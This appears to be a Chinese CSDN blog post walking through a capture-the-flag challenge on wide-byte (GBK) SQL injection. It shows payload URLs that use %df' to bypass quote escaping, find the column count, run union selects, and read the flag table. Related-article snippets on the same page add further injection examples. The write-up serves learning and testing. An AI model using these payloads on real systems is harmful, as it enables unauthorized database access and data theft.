宽字节注入实例

最新推荐文章于 2024-06-25 18:15:00 发布
最新推荐文章于 2024-06-25 18:15:00 发布
阅读量2k 收藏 2
点赞数 1
分类专栏: 安全 文章标签: SQL
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wst0717/article/details/81541730
版权

http://103.238.227.13:10083/?id=1

我们看一下html源码

看到编码变化了

所以是宽字节注入

 

所以我们要用%df来代替一个字节

http://103.238.227.13:10083/?id=1%df

 

页面正确

加个单引号页面报错

http://103.238.227.13:10083/?id=1%df

页面报错

存在注入

 

http://103.238.227.13:10083/?id=1%df' order by 2--+

判断最大字段为2

开始使用联合查询

 

 

http://103.238.227.13:10083/?id=1%df' union select 1,2--+

http://103.238.227.13:10083/?id=1%df' union select 1,database()--+

 

得到数据库了  我们来查一下flag

http://103.238.227.13:10083/?id=1%df' union select 1,string from sql5.key where id =1--+

 

 

小蘑菇~~~
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
DLL注入实例+教程
10-17
远程注入DLL方法有很多种,也是很多木马病毒所使用的隐藏进程的方法,因为通过程序加载的DLL在进程管理器是没有显示的.这里介绍一种用 CreateRemoteThread 远程建立线程的方式注入DLL. 首先,我们要提升自己的...
SQL注入攻击与防御
03-12
5. **宽字节注入**:利用多字节字符集编码特点来绕过输入过滤。 #### 三、SQL注入实例 为了更好地理解SQL注入的工作原理,下面通过一个简单的例子来进行说明: 假设有一个登录页面,其用户名验证部分的SQL语句...
宽字节注入原理分析
1stPeak's Blog
06-07 1万+
什么是宽字节? 如果一个字符的大小是一个字节的,称为窄字节;如果一个字符的大小是两个字节的,成为宽字节。 像GB2312、GBK、GB18030、BIG5、Shift_JIS等这些编码都是常说的宽字节,也就是只有两字节 英文默认占一个字节,中文占两个字节 什么是宽字节注入? 原理: 宽字节注入是利用了mysql的一个特性,即mysql在使用GBK编码时,在url解码时会认为两个字符是一个汉字(前一个ASCII码要大于128,才表示到汉字的范围) 通常情况下,一个utf-8编码的汉子占用3个字节,一个GBK编
浅析常见WEB安全漏洞及其防御措施_web漏洞防护
最新发布
Z4400840的博客
06-25 875
在网络攻防中,Web系统通常是攻击者的首选目标,攻击者大都通过Web打点的方式,先拿到边界Web服务器的权限,再以此为跳板实施内网横向渗透。由于Web系统通常涉及大量的用户数据和敏感信息,一旦受到攻击或破坏,可能造成数据泄露、服务中断等影响。相较于攻击方,Web系统也是防守方的重点防护对象。作为安全开发或安全运营人员,及早发现和修复潜在的WEB安全漏洞,不仅有助于提高互联网业务系统的稳定性,也能降低后期安全运营工作的压力和成本。【一一帮助安全学习,所有资源获取处一一】①网络安全学习路线。
SQL注入-09】宽字节注入案例—以sqli-labs-less32为例
m0_64378913的博客
05-01 2493
符号 GBK编码 ’ 27
宽字节注入讲解-墨者学院(SQL注入漏洞测试(宽字节))
T1ngSh0w的博客
09-18 4948
宽字节注入原理讲解+墨者学院(SQL注入漏洞测试(宽字节))题目详解
宽字节注入详解
xyx107的博客
08-11 5178
尽管现在呼吁所有的程序都使用unicode编码,所有的网站都使用utf-8编码,来一个统一的国际规范。但仍然有很多,包括国内及国外(特别是非英语国家)的一些cms,仍然使用着自己国家的一套编码,比如gbk,作为自己默认的编码类型。也有一些cms为了考虑老用户,所以出了gbk和utf-8两个版本。 我们就以gbk字符编码为示范,拉开帷幕。gbk是一种多字符编码,具体定义自行百度。但有一个地方尤其要...
SQL注入实战:宽字节注入
ting_liang的博客
01-21 1008
2、数据库使用的是GBK编码,PHP编码为UTF8就可能出现宽字节注入,原因是为了防止发生SQL注入,会调用上面所介绍的几种函数,将单引号或双引号转义操作,在单或双引号前加斜杠(\)。1、%DF':会被PHP当中的addslashes函数转义为“%DF\’",\在URL里是“%5C”,那么也就是说,“%DF'"会被转成“%DF%5C%27,倘若网站的字符集是GBK,MYSOL使用的编码也是GBK的话,就会认为“%DF%5C%27"是一个宽字符。addslashes()函数。二、php中的宽字节。
sql注入】宽字节注入详解
Yuppie001的博客
04-14 793
1.什么是宽字节?2.宽字节注入原理二.sqli-labs-36关。
MySQL注入 -- 宽字节注入
weixin_41489908的博客
05-21 1790
​很多事情,原来努力了,也得不到满意的结果。。。 ---- 网易云热评 一、宽字节注入介绍 1、在注入点输入(')会被转义为(\')编码后为(%5c%27),只有把斜杆去掉才能注入 2、GBK编码表,%DF%5C正好组成(運),所以会把\"吃掉",0X81-0XFE都可以 二、实例演示 1、获取数据库名称 http://192.168.139.129/sqli/Less-32/?id=1%81' and 1=2 union select 1,2,database() --+ ...
宽字节注入原理学习
身高两米不到的博客
03-18 4960
0x01 开篇 本题用到考点是宽字节注入,遇到这种注入类型学习记录。 推荐两篇链接:浅析白盒审计中的字符编码及SQL注入 | 离别歌 Von的博客 | Von Blog 为方便自我下次忘记,总结一下: 1.宽字节涉及到编码问题,便于理解需要看一看 2.宽字节注入现在已经很少见,因为如今的编码大多使用utf-8 常见url编码: 空格 --%20 ' --%27 # --%23 \ --%5c 0x02 原理 我们注入时都会简单输入一个 ' 或者 " ,进行测试,如果数据库过滤不严格就会产生报错
宽字节注入讲解
weixin_41489908的博客
09-09 5173
我讨厌现在的自己,一边压抑着自己的情绪,一边装作没事的样子,一到深夜就彻底崩溃了,天亮后还要微笑面对生活。。。 ---- 网易云热评 一、原理 1、单字节字符集: 所有的字符都使用一个字节来表示,比如 ASCII 编码(0-127) 2、多字节字符集: 在多字节字符集中,一部分字节用多个字节来表示,另一部分(可能没有)用单个字节来表示。 3、宽字节注入是利用mysql的一个特性,使用GBK编码的时候,会认为两个字符是一个汉字 二、addslashes()函数 1、addslashes(..
字节跳动面试题.pdf
05-07
7. **ApplicationContext的初始化过程**:Spring的ApplicationContext在初始化时会加载配置文件,创建Bean实例,处理依赖注入,并在检测到循环依赖时使用三级缓存策略解决。 8. **GC收集器**:Java垃圾回收使用多种...
SSM 整合实例
02-25
总结来说,SSM整合实例展示了如何将Spring的控制反转和依赖注入,Spring MVC的MVC架构,以及MyBatis的SQL映射和动态SQL结合,以实现一个完整的Java Web应用程序。这个实例涵盖了从数据库设计、业务逻辑编写、视图...
Spring 框架中注入或替换方法实现
08-27
singleton Bean 是单实例的,意味着每次注入该 Bean 时都将返回同一个实例,而 prototype Bean 是多实例的,每次注入该 Bean 时都将返回一个新的实例。 在 singleton Bean 中,如果我们向其注入 prototype Bean,并...
未授权访问漏洞总结
热门推荐
七月_的博客
08-20 2万+
Web端 http://219.141.242.77:7777/pe-admin/ #后台未授权访问 http://219.141.242.77:7777/pe-admin/main.jsp 参考:华泰保险某系统漏洞打包(未授权访问\弱口令\Getshell) 服务端 未授权访问可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷,导致其他用户可以直接访问,从而引发重要权限可被...
MongoDB未授权访问漏洞及加固
七月_的博客
06-24 9269
MongoDB MongoDB 是一个基于分布式文件存储的数据库。由 C++ 语言编写。旨在为 WEB 应用提供可扩展的高性能数据存储解决方案。 MongoDB 是一个介于关系数据库和非关系数据库之间的产品,是非关系数据库当中功能最丰富,最像关系数据库的。 ...
ERROR: x86 emulation currently requires hardware acceleration!
七月_的博客
11-13 5498
14:22    Emulator: emulator: ERROR: x86 emulation currently requires hardware acceleration! 14:22    Emulator: Process finished with exit code 1 运行报错 参考youtubu视频,整理的解决方式如下 首先确定你的BOIS设置正确 其次以管理...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值